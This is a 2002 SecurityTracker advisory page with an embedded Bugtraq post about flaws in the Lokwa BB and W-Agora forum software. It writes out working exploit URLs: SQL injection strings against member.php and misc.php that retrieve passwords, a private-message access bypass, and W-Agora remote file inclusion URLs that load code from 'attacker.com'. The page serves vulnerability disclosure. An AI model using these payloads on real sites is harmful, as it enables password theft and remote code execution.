SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Lokwa BB Vendors:   Lokwa
Lokwa BB Bulletin Board Bugs Let Remote Authenticated Users Read Private Messages and Also Execute SQL Commands on the Database
SecurityTracker Alert ID:  1004495
SecurityTracker URL:  http://securitytracker.com/id/1004495
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 9 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.2.2
Description:   Several vulnerabilities were reported in the Lokwa BB bulletin board. A remote authenticated user can read private messages of other users and can inject SQL commands to be executed by the underlying database.

It is reported that the 'member.php' script does not validate user-supplied input in the '$member' variable. So, a remote user could submit a URL that contains SQL commands to be executed by the underlying database.

For example, the following type of URL will result in an SQL command being executed on the server:

http://[targethost]/member.php?action=viewpro&member='%20OR%20password='PASSWORD

The command will be:

SELECT * FROM lokwa_users WHERE username='' OR password='PASSWORD'

This can be used to retrieve the passwords for all accounts on the system. The same type of exploit method can be used by a remote authenticated user to post messages and retrieve various information from the database.

A similar flaw reportedly exists in the 'misc.php' script.

It is reported that when a user responds to a message, the pm.php script does not verify that the message being replied to was actually sent to the user that is replying. The following type of URL can be submitted by a remote user to view message #1 regardless of whether message #1 was originally destined to the remote user or not.

http://www.victim.com/pm.php?action=reply&pmid=1

The original advisory is available (in French language) at:

http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Impact:   A remote user can execute arbitrary SQL commands on the database. This allows the remote user to view passwords and other information for users on the bulleting board.

A remote user can also view private messages belonging to other users.

Solution:   No solution was available at the time of this entry.
Vendor URL:  lokwa.farcom.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Security holes in LokwaBB and W-Agora


Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do 
it :)  I just hope that doesn't give more work to the webmasters.

Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net

Problem :
- Including file

Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

More details in french :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Translated by Goolge :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/

Problems :
- XSS
- Privates messages reading
- SQL Injection

Exploits :
- 
http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
- 
http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

More details in french :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools



Sorry for my poor english :)
frog-m@n



_________________________________________________________________
http://explorer.msn.fr/intl.asp.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC